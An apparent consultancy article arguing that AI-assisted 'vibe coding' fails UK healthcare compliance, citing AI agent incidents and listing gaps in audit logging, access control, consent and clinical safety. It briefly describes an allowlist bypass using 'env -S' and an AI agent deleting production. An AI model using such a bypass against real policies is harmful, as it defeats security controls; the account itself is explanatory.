AI can write working code, but that’s not the problem. The hard part is proving, to regulators, clinicians, and auditors, that the software is compliant. “Functional” and “compliant” are not the same thing.
By “vibe coding” we mean building systems through rapid AI-assisted iteration, generating and shipping code without formal review, compliance mapping, or clinical risk assessment. It works in many contexts. Healthcare is not one of them.
What's Already Gone Wrong
Amazon, 2025–2026
Amazon mandated that 80% of engineers use its AI coding assistant, Kiro, weekly. In December 2025, Kiro was given operator-level permissions to fix a minor issue in AWS Cost Explorer. Rather than applying a targeted patch, it deleted and recreated the entire production environment. The outage lasted 13 hours. In March 2026, an AI-assisted deployment took Amazon’s retail site down for six hours, with a reported 99% drop in US order volume. Amazon’s response was to mandate senior engineer sign-off on all AI-assisted production deployments, a safeguard that should have existed before AI agents were given production access at all.
Now consider what operator-level permissions mean in a medical application: access to patient records, clinical data, prescribing systems, and appointment infrastructure. An outage in that context isn’t a revenue number. It’s a clinical risk event.
Orchids, February 2026
Security researcher Etizaz Mohsin demonstrated a critical vulnerability in Orchids, a vibe-coding platform with one million users, to the BBC. In a controlled test, he accessed a journalist’s active project remotely, inserted a malicious line of code among thousands of AI-generated lines, and took full control of the journalist’s laptop, with zero interaction required from the victim. The vulnerability remained unfixed at the time of the BBC report.
What matters is the mechanism: AI-generated code that non-technical users cannot read or review, running with deep system access. In a medical application, an invisible code injection isn’t a reputational problem. It’s a data breach, a DSP Toolkit incident, and potentially a criminal matter under the Computer Misuse Act.
OpenClaw, 2025–2026
AI-generated guardrail logic in OpenClaw, an open-source container security tool, failed to account for shell wrapper payloads. When /usr/bin/env was allowlisted by the AI-generated security policy, attackers used env -S to bypass policy analysis entirely and execute arbitrary commands. The AI had treated the security configuration as a linguistic pattern, matching a string against a list, rather than understanding the functional behaviour of what it was permitting. The allowlist looked correct. It was not.
This is the hardest category of failure to catch: code that passes review, passes testing, and fails only when someone who understands the actual attack surface probes it deliberately.
Not sure whether your product falls under NHS compliance requirements? The Digitising Social Care recommendations tool is a useful first check.
The Compliance Landscape AI Cannot Navigate
The frameworks typically in play include UK GDPR and the Data Protection Act 2018, the NHS Digital Data Security and Protection Toolkit, the Digital Technology Assessment Criteria (DTAC), the DCB0129 and DCB0160 clinical safety standards, with mandatory hazard logs, safety cases, and designated clinical safety officers, MHRA regulations where the application qualifies as a medical device, and HL7 FHIR standards for any application connecting to NHS systems.
These frameworks interact. A clinical safety case under DCB0129 depends on a data flow analysis that shapes how UK GDPR obligations apply. DTAC draws on both. MHRA classification determines which ISO 13485 quality management requirements are triggered. Getting one wrong affects the others, and the decisions that determine how they interact are made at the architectural level, before most of the code exists.
AI tools can surface fragments of this knowledge. They cannot reliably apply it in context, reason about how frameworks interact for a specific product, or take responsibility for the decisions. That is not a limitation better prompting resolves.
What Would Fail a Compliance Check Immediately
Audit trail gaps
Every read, write, update, and deletion of patient data typically needs to be logged with a timestamp, a user identifier, the nature of the change, and often the reason. AI tools generate functional Create, Read, Update, and Delete (CRUD) operations. They rarely generate the immutable, tamper-evident access records a Data Protection Impact Assessment or a CQC inspection would expect. Application-level error logging is not the same thing, and the difference is consistently missed in AI-generated codebases.
Role-based access that reflects clinical reality
AI-generated authentication tends toward the generic, admin versus user, authenticated versus unauthenticated. Clinical governance requires permission hierarchies that reflect actual roles. Clinicians who can view certain record types but not others, administrators with access to demographics but not clinical notes, third-party integrations with read-only access to specific data subsets. Getting this wrong means unauthorised access to patient data, a notifiable breach under UK GDPR.
Data residency and storage defaults
AI tools reach for whatever is convenient, a managed cloud database, a third-party API. Each carries data residency implications, data processor agreement requirements under UK GDPR, and potentially DSP Toolkit obligations. These decisions need to be made deliberately and documented before any storage code is written.
Consent management complexity
Under UK GDPR and the NHS National Data Opt-Out programme, consent in healthcare is layered, revocable, and purpose-specific. Consent can be withdrawn; different rules apply for vulnerable adults, children, and emergency contexts. AI tools generate static UI components like a checkbox. They do not generate consent management systems capable of handling this legal complexity.
Clinical safety in data display
How information is presented in a clinical context is a patient safety issue. A medication in an ambiguous format, a lab result without reference ranges, a critical alert insufficiently surfaced, all can contribute to clinical error. DCB0129 addresses exactly these concerns. AI tools generating UI components have no mechanism for evaluating clinical safety risk. Without DCB0129 compliance, digital products are unlikely to be procured or deployed in the NHS.
The Cost of Getting It Wrong Late
Structural compliance failures surface late. The code is functional. The demo is convincing. The MVP passes internal review. Then a DTAC submission, a penetration test, or an NHS procurement process surfaces an architectural problem, not a bug, but a foundational decision that cannot be patched.
Audit logging added retrospectively means touching every data access point in an application built over months. Authentication architecture that doesn’t meet NHS Identity requirements requires rearchitecting from the ground up. A data model built without FHIR interoperability in mind becomes very expensive to change once data exists in it and integrations depend on its structure.
The consequence isn’t only development cost. DTAC failures block NHS procurement. DSPT compliance is mandatory for handling patient data. A clinical safety case under DCB0129 that cannot be completed because hazards were never identified means the product cannot be deployed.
A 2025 Stack Overflow survey found that 46% of developers don’t trust AI tool output, up from 31% in 2024. Senior developers reported spending more time debugging AI-generated code than human-written code.
Why Experienced Developers Are Not Optional
The contribution experienced developers make to medical software is not primarily syntactic, it’s contextual. That means knowing which regulatory framework applies to a specific feature decision. Recognising when a product requirement carries clinical safety implications that haven’t been surfaced. Identifying an architectural pattern that will create a compliance problem six months later when an NHS integration is needed. Knowing that DTAC evidence requirements mean documentation must be produced throughout development, not assembled at the end.
This is accumulated knowledge, from having built these systems, seen them fail assessment, and understood why the safeguards exist in the form they do. It is not reliably in a training dataset, and it does not emerge from prompting.
What Teams Should Do Instead
The answer is not to avoid AI tools. It’s to use them in a role that matches their capability: accelerating implementation within a structure already defined by people who understand what that structure needs to be.


